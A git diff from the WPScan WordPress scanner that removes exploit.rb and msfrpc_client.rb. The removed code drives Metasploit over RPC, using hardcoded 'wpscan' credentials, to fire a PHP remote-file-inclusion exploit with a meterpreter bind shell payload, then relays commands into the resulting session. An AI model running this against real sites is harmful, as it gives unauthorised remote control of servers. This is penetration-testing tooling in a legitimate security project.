explot files removed

lib/wpscan/exploit.rb

@@ -1,207 +0,0 @@
-#!/usr/bin/env ruby
-
-#--
-# WPScan - WordPress Security Scanner
-# Copyright (C) 2012-2013
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-#++
-
-# This library should contain all methods for exploitation.
-
-class Exploit
-
-  attr_accessor :rhost, :type, :uri, :postdata
-
-  def initialize(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port)
-    @wp_url = URI.parse(wp_url.to_s)
-    @rhost = @wp_url.host
-    @path = @wp_url.path
-    @type = type
-    @uri = uri
-    @postdata = postdata
-    @session_in_use = nil
-    @use_proxy = use_proxy
-    @proxy_addr = proxy_addr
-    @proxy_port = proxy_port
-    start()
-  end
-
-  # figure out what to exploit
-
-  def start()
-    if @type == "RFI"
-      puts
-      puts "[?] Exploit? [y/n]"
-      answer = Readline.readline
-      if answer =~ /^y/i
-        msf_module = "exploit/unix/webapp/php_include"
-        payload = "php/meterpreter/bind_tcp"
-        exploit(msf_module, payload)
-      else
-        return false
-      end
-    elsif @type == "SQLI"
-    end
-  end
-
-  # exploit
-
-  def exploit(msf_module, payload)
-
-    exploit_info(msf_module,payload)
-
-    if @postdata == ""
-      result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:PAYLOAD => payload})
-    else
-      result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:POSTDATA => @postdata, :PAYLOAD => payload})
-    end
-
-    if result['result'] == "success"
-      puts "[*] Exploit worked! Waiting for a session..."
-
-      session_spawn_timer = Time.new
-      while sessions.nil? or sessions.empty?
-        # wait for a session to spawn with a timeout of 1 minute
-        if Time.now - session_spawn_timer > 60
-          puts "[ERROR] Session was not created... exiting."
-          return false
-        end
-      end
-
-      choose_session()
-
-      input = nil
-      while input.nil?
-        puts meterpreter_read(last_session_id())
-        input = Readline.readline
-        if input == "exit"
-          kill_session(@session_in_use)
-          return false
-        end
-        meterpreter_write(last_session_id(), input)
-        input = nil
-      end
-
-    else
-      puts "[ERROR] Exploit failed! :("
-      return false
-    end
-  end
-
-  # output our exploit data
-
-  def exploit_info(msf_module,payload)
-    info = RpcClient.new.get_exploit_info(msf_module)
-    puts
-    puts "| [EXPLOIT]"
-    puts "| Name: " + info['name']
-    puts "| Description: " + info['description'].gsub!("\t", "").gsub!("\n\n","\n").gsub!("\n", "\n| ").chop!
-    puts "| [OPTIONS]"
-    puts "| RHOST: " + @rhost
-    puts "| PATH: " + @path
-    puts "| URI: " + uri
-    puts "| POSTDATA: " + @postdata if @postdata != ""
-    puts "| Payload: " + payload
-    puts
-  end
-
-  # not sure if this is needed?! not used.
-
-  def job_id()
-    jobs = RpcClient.new.jobs()
-    puts jobs
-  end
-
-  # all sessions and related session data
-
-  def sessions()
-    sessions = RpcClient.new.sessions()
-  end
-
-  # the last active session id created
-
-  def last_session_id()
-    sessions.keys.last
-  end
-
-  # a count of the amount of active sessions
-
-  def session_count()
-    sessions().size
-  end
-
-  # if there is more than 1 session,
-  # allow the user to choose one.
-
-  def choose_session()
-    if session_count() >= 2
-      puts "[?] We have " + session_count().to_s + " sessions running. Please choose one by id."
-      open_sessions = ""
-      sessions.keys.each do |open_session|
-        open_sessions += open_session.to_s + " "
-      end
-      puts open_sessions
-      use_session = Readline.readline
-      puts "Using session " + use_session.to_s
-      @session_in_use = use_session
-    else
-      puts "Using session " + last_session_id().to_s
-      @session_in_use = last_session_id()
-    end
-  end
-
-  # kill a session by session id
-
-  def kill_session(id)
-    begin
-      killed = RpcClient.new.kill_session(id)
-      if killed['result'] == "success"
-        puts "[-] Session " + id.to_s + " killed."
-      end
-    rescue
-      puts "[] Session " + id.to_s + " does not exist."
-      return false
-    end
-  end
-
-  # read data from a shell, meterpreter is not classed
-  # as a shell.
-
-  def read_shell(id)
-    RpcClient.new.read_shell(id)['data']
-  end
-
-  # write data to a shell, meterpreter is not classed
-  # as a shell.
-
-  def write_shell(id, data)
-    RpcClient.new.write_shell(id, data)
-  end
-
-  # read data from a meterpreter session
-  # data must be base64 decoded.
-
-  def meterpreter_read(id)
-    Base64.decode64(RpcClient.new.meterpreter_read(id)['data'])
-  end
-
-  # write data to a meterpreter session
-  # data must be base64 encoded.
-
-  def meterpreter_write(id, data)
-    RpcClient.new.meterpreter_write(id, Base64.encode64(data))
-  end
-
-end

lib/wpscan/msfrpc_client.rb

@@ -1,143 +0,0 @@
-#!/usr/bin/env ruby
-
-#--
-# WPScan - WordPress Security Scanner
-# Copyright (C) 2012-2013
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-#++
-
-# This library should contain all methods to communicate with msfrpc.
-# See framework/documentation/msfrpc.txt for further information.
-# msfrpcd -S -U wpscan -P wpscan -f -t Web -u /RPC2
-# name = exploit/unix/webapp/php_include
-
-class RpcClient
-
-  def initialize
-    @config = {}
-    @config['host'] = "127.0.0.1"
-    @config['path'] = "/RPC2"
-    @config['port'] = 55553
-    @config['user'] = "wpscan"
-    @config['pass'] = "wpscan"
-    @auth_token = nil
-    @last_auth = nil
-
-    begin
-       @server = XMLRPC::Client.new3( :host => @config["host"], :path => @config["path"], :port =>  @config["port"], :user => @config["user"], :password => @config["pass"])
-    rescue => e
-      puts "[ERROR] Could not create XMLRPC object."
-      puts e.faultCode
-      puts e.faultString
-    end
-  end
-
-  # login to msfrpcd
-
-  def login()
-    result = @server.call("auth.login", @config['user'], @config['pass'])
-
-    if result['result'] == "success"
-      @auth_token = result['token']
-      @last_auth = Time.new
-      logged_in = true
-    else
-      puts "[ERROR] Invalid login credentials provided to msfrpcd."
-      logged_in = false
-    end
-   
-  end
-
-  # check authentication
- 
-  def authenticate()
-    login() if @auth_token.nil?
-    login() if (Time.now - @last_auth > 600)
-  end
-
-  # retrieve information about the exploit
-
-  def get_exploit_info(name)
-    authenticate()
-    @server.call('module.info', @auth_token, 'exploit', name)
-  end
-
-  # retrieve exploit options
-
-  def get_options(name)
-    authenticate()
-    @server.call('module.options', @auth_token, 'exploit',name)
-  end
-
-  # retrieve the exploit payloads
-
-  def get_payloads(name)
-    authenticate()
-    @server.call('module.compatible_payloads', @auth_token, name)
-  end
-
-  # execute exploit
-
-  def exploit(name, opts)
-    authenticate()
-    @server.call('module.execute', @auth_token, 'exploit', name, opts)
-  end
- 
-  # list msf jobs
-
-  def jobs()
-    authenticate()
-    @server.call('job.list', @auth_token)
-  end
-
-  # list msf sessions
-
-  def sessions()
-    authenticate()
-    @server.call('session.list', @auth_token)
-  end
-
-  # kill msf session
-
-  def kill_session(id)
-    authenticate()
-    @server.call('session.stop', @auth_token, id)
-  end
-
-  # reads any pending output from session
-
-  def read_shell(id)
-    authenticate()
-    @server.call('session.shell_read', @auth_token, id)
-  end
-
-  # writes the specified input into the session
-
-  def write_shell(id, data)
-    authenticate()
-    @server.call('session.shell_write', @auth_token, id, data)
-  end
-
-  def meterpreter_read(id)
-    authenticate()
-    @server.call('session.meterpreter_read', @auth_token, id)
-  end
-
-  def meterpreter_write(id, data)
-    authenticate()
-    @server.call('session.meterpreter_write', @auth_token, id, data)
-  end
-
-end

spec/spec_helper.rb

@@ -27,10 +27,6 @@ if RUBY_VERSION >= "1.9"
     add_filter "_helper.rb"
     add_filter "environment.rb"
     add_filter "_plugin.rb"
-
-    # Unused files at this time
-    add_filter "exploit.rb"
-    add_filter "msfrpc_client.rb"
   end
 end